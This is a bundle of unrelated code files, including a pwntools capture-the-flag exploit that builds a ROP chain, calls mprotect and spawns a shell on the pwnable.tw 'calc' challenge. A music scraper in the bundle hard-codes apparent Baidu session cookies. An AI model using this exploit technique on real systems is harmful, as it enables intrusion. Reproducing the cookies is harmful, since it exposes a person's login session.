            pending.extend(self.nodes.get(edge.dependent, []))
        return 0, []

    def get_child_with_arc(self, token_id: int, arc: str, follow: Tuple = ()) -> Union[None, OrderedDict]:
        """Return the first child of `token_id` reached via `arc`, or None.

        Edges whose labels appear in `follow` are traversed transitively.
        """
        pending = list(self.nodes.get(token_id, []))
        while pending:
            edge = pending.pop()
            if edge.arc == arc:
                return self.tokens[edge.dependent - 1]
            if edge.arc in follow:
                pending.extend(self.nodes.get(edge.dependent, []))
        return None

    def collect_compounds(self, token_id: int) -> List[OrderedDict]:
        """Return `token_id`'s token plus any 'compound' dependents, sorted by id."""
        parts = [self.tokens[token_id - 1]]
        pending = list(self.nodes.get(token_id, []))
        while pending:
            edge = pending.pop()
            if edge.arc == 'compound':
                parts.append(self.tokens[edge.dependent - 1])
            pending.extend(self.nodes.get(edge.dependent, []))
        return sorted(parts, key=lambda tok: tok['id'])
|
import json
import os
import luigi
import pandas as pd
from luigi.contrib.spark import PySparkTask
from pyspark.sql import SparkSession
from pyspark.sql.functions import max as max_
from bicis.etl.raw_data.unify import UnifyRawData
from bicis.lib.data_paths import data_dir
class DatasetSplitter(PySparkTask):
    """Splits the unified raw data into training/validation/testing CSVs.

    The split is time-based on rent_date: the last `test_period` of data is
    the test set, the `validation_period` before it is validation, and
    everything earlier is training. The chosen boundary dates are written to
    a metadata JSON next to the CSVs.
    """

    # These are held constant to "ensure" reproducibility
    validation_period = '90D'
    test_period = '90D'

    def requires(self):
        return UnifyRawData()

    def output(self):
        # Four targets: the three splits plus the metadata describing them.
        return {
            'training': luigi.LocalTarget(os.path.join(data_dir, 'unified/training.csv')),
            'validation': luigi.LocalTarget(os.path.join(data_dir, 'unified/validation.csv')),
            'testing': luigi.LocalTarget(os.path.join(data_dir, 'unified/testing.csv')),
            'metadata': luigi.LocalTarget(os.path.join(data_dir, 'unified/split_metadata.json'))
        }

    def main(self, sc, *args):
        spark_sql = SparkSession.builder.getOrCreate()
        raw_data = self.requires().load_dataframe(spark_sql)

        # Latest timestamp present in BOTH rent_date and return_date, so every
        # row in the splits has complete information.
        max_dates = (
            raw_data
            .groupBy()
            .agg(max_('rent_date'), max_('return_date'))
            .first()
        )
        max_date = min(max_dates.asDict().values())

        # Walk backwards from the newest data: test period first, then the
        # validation period; everything older is training.
        testing_end_date = max_date
        validation_end_date = testing_start_date = testing_end_date - pd.Timedelta(self.test_period).to_pytimedelta()
        training_end_date = validation_start_date = validation_end_date - pd.Timedelta(self.validation_period).to_pytimedelta()

        # Each split is only written when missing, so reruns are incremental.
        if not self.output()['training'].exists():
            (
                raw_data
                .filter(raw_data.rent_date < training_end_date)
                .write
                .csv(self.output()['training'].path, header='true')
            )
        if not self.output()['validation'].exists():
            (
                raw_data
                .filter(raw_data.rent_date >= validation_start_date)
                .filter(raw_data.rent_date < validation_end_date)
                .write
                .csv(self.output()['validation'].path, header='true')
            )
        if not self.output()['testing'].exists():
            (
                raw_data
                .filter(raw_data.rent_date >= testing_start_date)
                .filter(raw_data.rent_date <= testing_end_date)
                .write
                .csv(self.output()['testing'].path, header='true')
            )
        # Persist the chosen boundaries so downstream tasks can inspect them.
        with self.output()['metadata'].open('w') as f:
            json.dump(
                {
                    'training_end_date': training_end_date.isoformat(),
                    'validation_start_date': validation_start_date.isoformat(),
                    'validation_end_date': validation_end_date.isoformat(),
                    'testing_start_date': testing_start_date.isoformat(),
                    'testing_end_date': testing_end_date.isoformat(),
                },
                f,
                indent=2,
            )
|
# -*- coding:utf-8 -*-
import os
import sys
import time
import threading
import requests
from lxml import etree
import urllib
reload(sys)
sys.setdefaultencoding('utf-8')
# "First write of this run" flag used by write_text_file to truncate once.
global flag
flag = 1
# Chart categories of interest on Baidu Music ("hot songs", "new songs").
tag_list = ["热歌","新歌"]
# Persist a dict to dict.txt (counterpart of readdict below).
def writedict(dict):
    """Serialise the mapping to dict.txt as a Python literal."""
    serialised = str(dict)
    with open('dict.txt', 'w') as fh:
        fh.write(serialised)
# Load the dict previously persisted by writedict.
def readdict():
    """Return the mapping stored in dict.txt, or {} when the file is missing.

    Only the first line is read (the writer emits a single line).
    """
    import ast  # local import: keeps the module-level import block untouched
    if not os.path.exists('dict.txt'):
        return {}
    with open('dict.txt', 'r') as f:
        line = f.readline()
    # SECURITY FIX: ast.literal_eval instead of eval() — the original executed
    # arbitrary expressions read from an on-disk file.
    return ast.literal_eval(line)
# Remove characters that are illegal in (Windows) file names.
def del_illegal_char(str):
    """Return the string with filename-illegal characters stripped out."""
    result = str
    for bad in ("\\", "/", ":", "*", "?", '"', "'", "<", ">", "|"):
        result = result.replace(bad, "")
    return result
# Remove spaces, newlines and tabs from anywhere in the string.
def trim(str):
    """Return the string with all tabs, newlines and spaces removed."""
    result = str
    for ws in ('\t', '\n', ' '):
        result = result.replace(ws, '')
    return result
# Detect whether the fetched HTML is Baidu Music's 404 page.
def is_404(html):
    """Return True when the parsed page contains the 404 template div."""
    tree = etree.HTML(html)
    return bool(tree.xpath('//div[@class="state-404 c9"]'))
def urlcode_tr(str):
    # Decode %-escapes and interpret the bytes as UTF-8 (Python 2 urllib API).
    return urllib.unquote(str).decode('utf-8')
def create_dir(name):
    # Create the directory if it is missing, announce it, and pause briefly
    # (crude rate limiting between crawler steps). Returns the name either way.
    if not os.path.exists(name):
        os.mkdir(name)
        print u'创建文件夹{}成功'.format(name)
        # NOTE(review): source indentation was lost — the sleep is assumed to
        # run only when a new directory was actually created; confirm.
        time.sleep(5)
    return name
def write_content_file(path_and_name,content,op='wb'):
    # Write binary content to the given path; warn and skip when empty.
    if not content:
        print u'写入的{}文件为空,请确认文件内容.....'.format(path_and_name)
        return
    with open(path_and_name,op) as f:
        f.write(content)
def write_text_file(path_and_name,text,op='a+'):
    # Append text to the file; on the first call of the run (flag == 1) any
    # pre-existing file is deleted so the output starts fresh.
    global flag
    # print flag
    if not text:
        #print u'写入的{}文件为空,请确认文件内容.....'.format(path_and_name)
        return
    if os.path.exists(path_and_name) and flag==1:
        flag = 0
        os.remove(path_and_name)
    with open(path_and_name,op) as f:
        f.write(str(text))
# Fetch a page body using a hard-coded browser User-Agent and session cookie.
def get_html(url):
    '''
    headers = {"Host":"music.baidu.com",
    "User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
    "Cookie":"__cfduid=d535414b37ab0e1f5e1a454ee1ac9283b1491409826; BAIDUID=B50E57EBDC27E3EA584EAB69D3C0569B:FG=1; BIDUPSID=99F61AC7C2C1D1C488471259D1FAA7B4; PSTM=1492784961; BDUSS=d4blV4azVNRjJ5aFlLZzNMTmtFR3Y4MVF1ZzJWSnVFYVUydEFnZXhVNVNpU3RaSVFBQUFBJCQAAAAAAAAAAAEAAACnjSlYyOXRxbXEssvE8c~It8kAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFL8A1lS~ANZUl; BDORZ=B490B5EBF6F3CD402E515D22BCDA1598; BDRCVFR[mlS6V4LF-w_]=mbxnW11j9Dfmh7GuZR8mvqV; PSINO=1; H_PS_PSSID=1451_21124; Hm_lvt_d0ad46e4afeacf34cd12de4c9b553aa6=1493603710,1493710963,1493729853,1493769596; Hm_lpvt_d0ad46e4afeacf34cd12de4c9b553aa6="+str(time.time()).split('.')[0]+"; checkStatus=true; tracesrc=-1%7C%7C-1; u_lo=0; u_id=; u_t="
    }
    '''
    # NOTE(review): the session cookie below is a hard-coded snapshot and will
    # eventually expire; the docstring above keeps an alternative variant that
    # stamps the current time into the cookie.
    headers = {"Host":"music.baidu.com",
        "User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
        "Cookie":"__cfduid=d535414b37ab0e1f5e1a454ee1ac9283b1491409826; BAIDUID=B50E57EBDC27E3EA584EAB69D3C0569B:FG=1; BIDUPSID=99F61AC7C2C1D1C488471259D1FAA7B4; PSTM=1492784961; BDUSS=d4blV4azVNRjJ5aFlLZzNMTmtFR3Y4MVF1ZzJWSnVFYVUydEFnZXhVNVNpU3RaSVFBQUFBJCQAAAAAAAAAAAEAAACnjSlYyOXRxbXEssvE8c~It8kAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFL8A1lS~ANZUl; BDORZ=B490B5EBF6F3CD402E515D22BCDA1598; checkStatus=true; BDRCVFR[mlS6V4LF-w_]=8Za7a4opMO6pydEUvn8mvqV; PSINO=1; H_PS_PSSID=1451_21124; Hm_lvt_d0ad46e4afeacf34cd12de4c9b553aa6=1493603710,1493710963,1493729853,1493769596; Hm_lpvt_d0ad46e4afeacf34cd12de4c9b553aa6=1493813422; tracesrc=-1%7C%7C-1; u_lo=0; u_id=; u_t="
    }
    request = requests.get(url=url,headers=headers)
    response = request.content
    # print response
    return response
#获得所有标签对应的url,以及分类
def get_tag_url_list(html):
    """Extract every tag name -> relative URL from the tag index page.

    Returns (tag_url_list, clazz): `tag_url_list` maps a category name
    to a {tag_name: tag_href} dict, `clazz` lists the category names in
    page order.
    """
    tree = etree.HTML(html)
    tag_url_list = {}   # all tags, grouped by category
    clazz = []          # all category names
    for block in tree.xpath('//div[@class="tag-main"]/div/dl'):
        heading = block.xpath('dt/text()')
        names = block.xpath('dd/span/a/text()')
        hrefs = block.xpath('dd/span/a/@href')
        key = urlcode_tr(heading[0])
        clazz.append(key)
        tag_url_list[key] = dict(zip(names, hrefs))
    return tag_url_list, clazz
#获取该标签的总音乐数
def get_music_totalpage(musiclist_html):
    """Return the total number of result pages for one tag listing."""
    tree = etree.HTML(musiclist_html)
    pages = tree.xpath('//div[@class="page-cont"]/div[@class="page-inner"]/a/text()')
    # No pager rendered means everything fits on a single page; otherwise
    # the second-to-last pager link holds the last page number.
    return int(pages[-2]) if pages else 1
#获取音乐url
def get_music_url(musiclist_html):
    """Collect the song-page hrefs from one page of a tag's song list.

    Each entry is the (possibly empty) list produced by xpath, exactly
    what downstream code expects (it indexes [0] later).
    """
    tree = etree.HTML(musiclist_html)
    rows = tree.xpath('//div[@class="main-body-cont"]/div[@class="tag-main"]/div[@data-listdata]/ul/li')
    return [row.xpath('div/span[@class="song-title"]/a[1]/@href') for row in rows]
#获取音乐信息
def save_one_music_information(music_html,tag_dir,filename):
    """Scrape one song page and append its metadata line to `filename`.

    Also downloads the .lrc lyric file next to it when a lyric link is
    present.  NOTE(review): shadows the builtins `dict` and `str` as
    locals — confusing but harmless inside this function.  Python 2.
    """
    soup = etree.HTML(music_html)
    li = []
    title = []
    songname = soup.xpath('//div[@class="mod-song-info"]/div[@class="song-info"]/div[@class="play-holder clearfix"]/div/h2/span[@class="name"]/text()') # song title
    li.append(soup.xpath('//div[@class="mod-song-info"]/div[@class="song-info"]//ul[@class="base-info c6"]/li[not(@class)]')) # artist row
    li.append(soup.xpath('//div[@class="mod-song-info"]/div[@class="song-info"]//ul[@class="base-info c6"]/li[@class="clearfix"]')) # album row
    li.append(soup.xpath('//div[@class="mod-song-info"]/div[@class="song-info"]//ul[@class="base-info c6"]/li[@class="clearfix tag"]')) # song-tag row
    lyric = soup.xpath('//div[@class="mod-song-info"]/div[@class="module song-lyric clicklog-lyric clearfix"]/div[@class="body "]/div[@class="lyric-content"]/@data-lrclink') # lyric link
    dict = {}
    # song title
    # dict[u'song title:'] = songname[0]
    i = 0
    # Artist: each section bumps i only when found, so a missing section
    # shifts the remaining lookups — NOTE(review): looks fragile; verify
    # pages always carry all three rows.
    if len(li[i]) >= 1:
        title.append(li[i][0].xpath('text()'))
        span = li[i][0].xpath('span[@class="author_list"]/a/text()')
        dict[title[i][0]] = span
        i += 1
    # Album
    if len(li[i]) >= 1:
        title.append(li[i][0].xpath('text()'))
        span = li[i][0].xpath('a/text()')
        dict[title[i][0]] = span
        i += 1
    # Song tags
    if len(li[i]) >= 1:
        title.append(li[i][0].xpath('span/text()'))
        span = li[i][0].xpath('a/text()')
        dict[title[i][0]] = span
        i += 1
    # Join every field as "label value1|value2-" into one line.
    str = ''
    for k in dict.keys():
        str = str + ''.join(k + '|'.join(dict[k]) + '-')
    print tag_dir+'\\'+filename,u"歌曲名:"+del_illegal_char(songname[0])+"-"+(trim(str) + '\n').replace(u':', ':')
    write_text_file(tag_dir+'\\'+filename,u"歌曲名:"+del_illegal_char(songname[0])+"-"+(trim(str) + '\n').replace(u':', ':'))
    # Write lyrics (.lrc) if the page exposes a lyric file link.
    if lyric:
        write_content_file(tag_dir+'\\'+del_illegal_char(songname[0])+'.lrc',get_html(lyric[0]))
def save_all_music_information(first_url,tag_url_list,clazz):
    """Crawl every tag of every category and persist song metadata.

    Layout on disk: file_root_dir\\<category>\\<tag>\\all_<tag>.txt plus
    one .lrc per song.  Progress per tag is checkpointed through
    readdict()/writedict() so a crashed run can resume.  Python 2.
    """
    global start,flag
    start = 0
    size = 20           # page size used by the listing endpoint
    start = start - size
    third_type = 0
    for c in clazz:
        if c==u'乐播':
            continue    # skip the radio category, it has no song lists
        url_dict = tag_url_list[c]
        tag_mod_dir = create_dir(file_root_dir + '\\' + c) # category folder
        url_list = []
        dict = readdict() # checkpoint: which tags were already crawled
        for k in url_dict.keys():
            d_flag = 0  # has this tag been crawled already?
            flag = 1
            for d in dict:
                if k == d and dict[d] != 0:
                    d_flag = 1
                    print k+' '+u'已被爬取过...'
                    break
            if d_flag == 1:
                continue
            v = url_dict[k]
            foldername = urlcode_tr(v.rsplit('/', 1)[-1])
            tag_dir = create_dir(tag_mod_dir + '\\' + foldername) # tag folder
            filename = 'all_'+foldername+'.txt' # aggregated song info file
            totalpage = get_music_totalpage(get_html(first_url + v))
            start = 0 - size
            total = totalpage * size
            # totalpage = 1
            music_url_list = []
            print 'start spider...'
            # Page through the tag listing, collecting song-page URLs.
            while True:
                start += size
                end = total / (start+size)
                if end<1:
                    break
                musiclist_html = get_html(first_url+v+'?'+'start={start}&size=20&third_type=0'.format(start=start))
                music_url_list.extend(get_music_url(musiclist_html))
                # print music_url_list
            # Then fetch and persist each song page.
            for music_url in music_url_list:
                music_html = get_html(index+music_url[0])
                if is_404(music_html):
                    continue
                # th = threading.Thread(target=save_one_music_information,args=(music_html,tag_dir,filename))
                # th.start()
                save_one_music_information(music_html,tag_dir,filename)
                # break  # uncommented only while testing
            dict[k] = 1         # mark tag done and checkpoint immediately
            writedict(dict)
            url_list.append('http://music.baidu.com/tag' + '/' + foldername)
            # time.sleep(6)  # pause between tags to avoid bot detection
        write_text_file(tag_mod_dir + '\\' + 'url_list.txt', url_list) # per-category tag URL index
        # break  # uncommented only while testing
def main():
    """Entry point: fetch the tag index page and crawl every tag."""
    global file_root_dir
    file_root_dir = 'file'   # root output folder, relative to the CWD
    create_dir(file_root_dir)
    global index,flag
    index = 'http://music.baidu.com'
    tag_url = "http://music.baidu.com/tag"
    tag_html = get_html(tag_url)
    tag_url_list,clazz = get_tag_url_list(tag_html)
    save_all_music_information(index,tag_url_list,clazz)

if __name__=="__main__":
    main()
|
#!/usr/bin/env python3
import pwn

# Set up pwntools for the correct architecture (read from the target ELF).
exe = pwn.context.binary = pwn.ELF('../calc')

# Run this python script inside tmux like this:
#     $> tmux
#     $> ./exploit GDB
# It will spawn a separate window with the GDB session
pwn.context.terminal = ["tmux", "splitw", "-h"]

# GDB script used when the exploit is launched with the GDB arg,
# e.g. ./exploit.py GDB
gdbscript = '''
# Just before returning from calc
break *0x08049433
break mprotect
continue
'''.format(**locals())   # NOTE(review): no placeholders, so this format() is a no-op

# Stack-slot offsets inside calc's expression buffer:
main_ret_address_offset = 361 # Offset where return address from the call to calc is stored
esp_placed_at_offset = 400 # At this offset, ESP was pushed to the stack
def start(argv=None, *a, **kw):
    """Start the exploit against the target.

    Launches under GDB, as a local process, or against the remote
    service depending on pwntools args (GDB / LOCAL / default remote).
    BUG FIX: the original used a mutable default (`argv=[]`); a fresh
    list is now created per call.
    """
    argv = argv or []
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    elif pwn.args.LOCAL:
        return pwn.process([exe.path] + argv, *a, **kw)
    else:
        return pwn.remote('chall.pwnable.tw', 10100)
def read_stack_offset(offset):
    """Leak the 32-bit word stored at calculator stack slot `offset`.

    "N+00" makes the parser print slot N's content as a signed decimal;
    it is mapped back onto an unsigned 32-bit value here.
    """
    assert offset > 0
    io.send('%d+00\n' % offset)
    leaked = int(io.recvline())
    return leaked & 0xffffffff
def get_absolute_stack_address_below_main():
    """Derive the absolute address of calc's saved return address.

    Leaks the saved ESP at `esp_placed_at_offset` and walks back the
    known number of 4-byte slots to the return-address slot.
    """
    esp_leak = read_stack_offset(esp_placed_at_offset)
    pwn.success("Read offset: 0x%08x" % esp_leak)
    slots_between = esp_placed_at_offset - main_ret_address_offset
    return esp_leak - slots_between * 4
def write_stack_offset(offset, value):
    """Store unsigned 32-bit `value` into calculator stack slot `offset`.

    The parser only accepts signed decimals, so values >= 2**31 are
    produced indirectly: write 1 first, then subtract the two's
    complement through slot offset+1 (which gets clobbered).
    """
    assert offset > 0
    assert value > 0
    assert value != 0   # NOTE(review): redundant given `value > 0` above
    if value >= 2**31:
        # This is a negative value and cannot
        # be written directly
        # Instead, write 1 to the offset,
        # then subtract such that value is obtained
        # This does destroy the value offset + 1
        write_stack_offset(offset, 1)
        val = 2 ** 32 - value + 1
        assert 0 < val < 2**31
        io.send(str(offset + 1) + '*00-' + str(val) + '\n')
    else:
        # Value is in range 0 < value < 2**31
        # Just write the value directly
        io.send(str(offset) + '*' + '00%' + str(value) + '\n')
    io.recvline()
def write_rop_chain_to_addr(addr, rop_chain):
    """Write `rop_chain` (bytes, length divisible by 4) into consecutive
    stack slots starting at slot `addr`, one little-endian word each."""
    assert len(rop_chain) % 4 == 0
    words = [rop_chain[i:i + 4] for i in range(0, len(rop_chain), 4)]
    for slot, word in enumerate(words):
        write_stack_offset(addr + slot, pwn.u32(word))
# Resolve mprotect's address from the target binary's symbol table.
mprotect_addr = exe.symbols['mprotect']
io = start()
io.recvuntil("=== Welcome to SECPROG calculator ===\n")
# Leak a stack address and page-align it for the mprotect call.
stack_addr = get_absolute_stack_address_below_main()
stack_addr_mod_pagesize = stack_addr - (stack_addr % 4096)
pwn.success("Stack absolute address is 0x%08x" % stack_addr)
pwn.success("Stack absolute address mod pagesize is 0x%08x" % stack_addr_mod_pagesize)
# ROP chain: mprotect(stack page, 4096, RWX), then jump to the shellcode
# placed immediately after the chain on the stack.
rop_chain = (
    pwn.p32(mprotect_addr) + # return from calc, go to mprotect
    pwn.p32(stack_addr + 16) + # return address after mprotect, go to shellcode
    pwn.p32(stack_addr_mod_pagesize) + # mprotect param: addr
    pwn.p32(4096) + # mprotect param: page size
    pwn.p32(7) + # mprotect param: rwx
    pwn.asm(pwn.shellcraft.sh()) # shellcode after stack has been marked executable
)
pwn.debug("ROP chain:\n%s" % pwn.hexdump(rop_chain))
write_rop_chain_to_addr(main_ret_address_offset, rop_chain)
# An empty line makes calc return, triggering the overwritten return address.
io.sendline()
io.interactive()
|
import tensorflow as tf
import matplotlib
import matplotlib.pyplot as plt
''' 加载数据集 '''
# Load MNIST (60k train / 10k test, 28x28 grayscale digit images).
mnist = tf.keras.datasets.mnist
(x_train, y_train),(x_test, y_test) = mnist.load_data()
# Reshape (-1,28,28) images to (-1,28,28,1) so Conv2D gets a channel axis.
x_train = x_train.reshape((-1,28,28,1))
x_test = x_test.reshape((-1,28,28,1))
# Normalise pixel values into [0, 1].
x_train, x_test = x_train / 255.0, x_test / 255.0
''' --> 构建CNN模型 '''
# CNN: conv -> max-pool -> flatten -> dense -> dropout -> 10-way softmax.
model = tf.keras.models.Sequential([
    tf.keras.layers.Conv2D(input_shape=(x_train.shape[1],
                           x_train.shape[2], x_train.shape[3]),
                           filters=32,kernel_size=(3,3), strides=(1,1),
                           padding='valid',activation='relu'),
    tf.keras.layers.MaxPool2D(pool_size=(2,2)),
    tf.keras.layers.Flatten(),
    tf.keras.layers.Dense(128, activation='relu'),
    tf.keras.layers.Dropout(0.2),
    tf.keras.layers.Dense(10, activation='softmax')
])
'''--> 定义损失函数与优化器 '''
model.compile(optimizer=tf.keras.optimizers.Adam (), # optimizer
              loss=tf.keras.losses.sparse_categorical_crossentropy, # loss for integer labels
              metrics=['accuracy']) # track prediction accuracy
'''--> 训练模型 '''
# Train 4 epochs, holding out 20% of the training set for validation.
history = model.fit(x_train, y_train, epochs=4,validation_split=0.2)
|
import time
from typing import List, Tuple, Union
from selenium.common.exceptions import (
NoSuchElementException,
TimeoutException,
)
from selenium.webdriver.chrome.webdriver import WebDriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.remote.webelement import WebElement
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.ui import WebDriverWait
from utilites.decorators import add_logger
import logging
logger = logging.getLogger(__name__)
'''
BasePage is the base class that every page object in this project inherits
from. The most common methods needed across all the project's Pages are
implemented here.
written_by: jiaul_islam
'''
class BasePage(object):
    """
    Base class for all page objects; bundles the common Selenium
    interactions (find, click, write, hover, frame handling) around one
    shared WebDriver and a default explicit-wait timeout.
    """
    def __init__(self, driver: WebDriver, timeout: int = 30) -> None:
        # Shared WebDriver instance and explicit-wait timeout in seconds.
        self._driver: WebDriver = driver
        self.timeout = timeout
    def find_element(self, *locator) -> WebElement:
        """ Find the element by the help of the locator that user shared.

        NOTE(review): on TypeError/AttributeError/NoSuchElementException
        this falls through and implicitly returns None despite the
        WebElement annotation — callers must handle None.
        """
        try:
            return self._driver.find_element(*locator)
        except TypeError as error:
            print(f"Unexpected Type Error [base.py || Line - 37]"
                  f"\n{repr(error)}")
        except AttributeError as error:
            print(f"Unexpected Attribute Error in find_element() ||\n{repr(error)}")
        except NoSuchElementException:
            pass
    def find_elements(self, *locator) -> Union[List[WebElement], None]:
        """ Find the elements by the help of the locator that user shared """
        try:
            return self._driver.find_elements(*locator)
        except TypeError as error:
            print(f"Unexpected Value Error [base.py || Line - 47]"
                  f"\n{repr(error)}")
        except AttributeError as error:
            print(f"Unexpected Attribute Error in find_elements() ||\n{repr(error)}")
        except NoSuchElementException:
            pass
    def is_visible(self, xpath_locator) -> bool:
        """ If the element is found in the Page then return True else False.

        NOTE(review): on TimeoutException/AttributeError this returns
        None (falsy) rather than False — works in boolean context but
        not for `is False` checks.
        """
        try:
            _element = WebDriverWait(self._driver, self.timeout).until(
                ec.visibility_of_element_located(xpath_locator))
        except TimeoutException:
            pass
        except AttributeError as error:
            print(f"Unexpected Attribute Error [base.py || Line - 60]"
                  f"\n{repr(error)}")
        else:
            return bool(_element)
    @add_logger
    def click(self, element_locator_xpath) -> None:
        """ Click a web element by a locator shared by the user """
        WebDriverWait(driver=self._driver,
                      timeout=self.timeout,
                      ignored_exceptions=None
                      ).until(ec.visibility_of_element_located(element_locator_xpath)).click()
    @add_logger
    def write(self, xpath_locator: Tuple[By, str], text: str) -> None:
        """ Write the text in web element by a locator shared by the user """
        WebDriverWait(self._driver, self.timeout).until(
            ec.visibility_of_element_located(xpath_locator)).send_keys(text)
    @add_logger
    def hover_over(self, xpath_locator: str) -> None:
        """ Hover over the element shared by the user locator """
        _element: Union[WebElement, None] = WebDriverWait(self._driver, self.timeout).until(
            ec.visibility_of_element_located(xpath_locator))
        if _element is not None:
            ActionChains(self._driver).move_to_element(_element).perform()
        else:
            raise AttributeError
    @add_logger
    def switch_to_frame(self, xpath_locator) -> None:
        """ Switch to a frame by a frame locator """
        _frame: Union[WebElement, None] = self._driver.find_element(*xpath_locator)
        self._driver.switch_to.frame(_frame)
    @add_logger
    def double_click(self, xpath_locator: Tuple[By, str]) -> None:
        """ Double click on a element by a locator """
        # poll_frequency=2: check every 2 seconds instead of the default 0.5
        _element: Union[WebElement, None] = WebDriverWait(self._driver, self.timeout, 2).until(
            ec.visibility_of_element_located(xpath_locator))
        ActionChains(self._driver).double_click(_element).perform()
    @add_logger
    def select_all(self, xpath_locator: Tuple[By, str]) -> None:
        """ Sends CTRL + A action to a page """
        # Focus the element first so the shortcut applies to it.
        WebDriverWait(self._driver, self.timeout).until(
            ec.visibility_of_element_located(xpath_locator)).click()
        ActionChains(self._driver).key_down(
            Keys.CONTROL).send_keys('a').key_up(Keys.CONTROL).perform()
    def get_text(self, xpath_locator: Tuple[By, str]) -> str:
        """ Get the text value of a web element shared by a user.

        Reads the "value" attribute (form fields), not the node text;
        returns None implicitly on timeout.
        """
        try:
            _val_of_elem: str = WebDriverWait(self._driver, self.timeout).until(
                ec.visibility_of_element_located(xpath_locator)).get_attribute("value")
        except TimeoutException as error:
            print(f"Unexpected Timeout Error [base.py || Line - 145]"
                  f"\n{repr(error)}")
        else:
            return _val_of_elem
    @add_logger
    def handle_frame_alert(self, frame_locator: str, ok_btn_locator: str) -> None:
        """ Checks for expected frames and press OK button in the frame """
        self.switch_to_frame(frame_locator)
        self.click(ok_btn_locator)
        # Always return to the main document after dealing with the frame.
        self._driver.switch_to.default_content()
    @add_logger
    def back_to_home_page(self, xpath_locator: Tuple[By, str]) -> None:
        """ Return to the homepage """
        self.click(xpath_locator)
    def wait_for_loading_icon_disappear(self, *locator: Tuple[By, str], _time: float = 1, _range: int = 600) -> None:
        """ Wait for loading_icon to vanish.

        Polls every `_time` seconds, up to `_range` attempts; gives up
        silently if the icon never disappears.
        """
        _counter = 1
        while _counter <= _range:
            _loading_icons: list = self._driver.find_elements(*locator)
            if not len(_loading_icons):
                break
            time.sleep(_time)
            _counter += 1
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Sample data used in testing gce_enforcer.
Consists exclusively of test constants.
"""
# Project and network names shared by all gce_enforcer test cases.
TEST_PROJECT = "test-project"
TEST_NETWORK = "test-network"
# Minimal compute.networks.list() response carrying the test network's
# selfLink, shaped like the GCE beta API output.
SAMPLE_TEST_NETWORK_SELFLINK = {
    "items": [
        {
            "selfLink": (u"https://www.googleapis.com/compute/beta/projects/"
                         "test-project/global/networks/test-network")
        },
    ]
}
RAW_EXPECTED_JSON_POLICY = """
[
{
"sourceRanges": [
"10.8.0.0/24"
],
"description": "Allow communication between instances.",
"allowed": [
{
"IPProtocol": "udp",
"ports": [
"1-65535"
]
},
{
"IPProtocol": "tcp",
"ports": [
"1-65535"
]
},
{
"IPProtocol": "icmp"
}
],
"name": "allow-internal-1"
},
{
"sourceRanges": [
"10.0.0.0/8"
],
"description": "Allow internal traffic from a range of IP addresses.",
"allowed": [
{
"IPProtocol": "udp",
"ports": [
"1-65535"
]
},
{
"IPProtocol": "tcp",
"ports": [
"1-65535"
]
},
{
"IPProtocol": "icmp"
}
],
"name": "allow-internal-0"
},
{
"sourceRanges": [
"127.0.0.1/32",
"127.0.0.2/32"
],
"description": "Allow public traffic from specific IP addresses.",
"allowed": [
{
"IPProtocol": "tcp",
"ports": [
"22"
]
},
{
"IPProtocol": "udp",
"ports": [
"9999"
]
},
{
"IPProtocol": "esp"
},
{
"IPProtocol": "ah"
}
],
"name": "allow-public-0"
}
]
"""
EXPECTED_FIREWALL_API_RESPONSE = {
"id":
u"projects/test-project/global/firewalls",
"items": [{
"sourceRanges": [u"10.8.0.0/24"],
"creationTimestamp":
u"2015-09-04T14:03:38.591-07:00",
"id":
u"3140311180993083845",
"kind":
u"compute#firewall",
"description":
u"Allow communication between instances.",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [{
"IPProtocol": u"udp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"tcp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"icmp"
}],
"name":
u"test-network-allow-internal-1"
}, {
"sourceRanges": [u"10.0.0.0/8"],
"description": (u"Allow internal traffic from a range of IP "
"addresses."),
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [{
"IPProtocol": u"udp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"tcp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"icmp"
}],
"name":
u"test-network-allow-internal-0"
}, {
"sourceRanges": [u"127.0.0.1/32", u"127.0.0.2/32"],
"description":
u"Allow public traffic from specific IP addresses.",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"allowed": [{
"IPProtocol": u"tcp",
"ports": [u"22"]
}, {
"IPProtocol": u"udp",
"ports": [u"9999"]
}, {
"IPProtocol": u"esp"
}, {
"IPProtocol": u"ah"
}],
"name":
u"test-network-allow-public-0"
}],
"kind":
u"compute#firewallList",
"selfLink": (
u"https://www.googleapis.com/compute/beta/projects/test-project/global/"
"firewalls")
}
EXPECTED_FIREWALL_RULES = {
"test-network-allow-internal-1": {
"allowed": [{
"IPProtocol": u"icmp"
}, {
"IPProtocol": u"tcp",
"ports": [u"1-65535"]
}, {
"IPProtocol": u"udp",
"ports": [u"1-65535"]
}],
"description":
u"Allow communication between instances.",
"name":
u"test-network-allow-internal-1",
"network": (u"https://www.googleapis.com/compute/beta/projects/"
"test-project/global/networks/test-network"),
"sourceRanges": [u"10.8.0.0/24"],
"priority": 1000,
